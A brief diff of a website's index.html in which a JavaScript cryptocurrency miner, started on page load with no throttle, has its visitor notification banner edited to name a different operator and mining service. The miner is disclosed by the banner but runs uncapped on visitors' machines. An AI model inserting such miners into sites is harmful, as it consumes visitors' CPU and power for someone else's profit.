--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
         throttle: 0, c: 'w'
     });
     _client.start();
-    _client.addMiningNotification("Top", "Nurutomo is running JavaScript miner from coinimp.com in this site", "#cccccc", 40, "#3d3d3d");
+    _client.addMiningNotification("Top", "els is running JavaScript miner from mintme in this site", "#cccccc", 40, "#3d3d3d");
 </script>
 <script>
     setTimeout(function(){
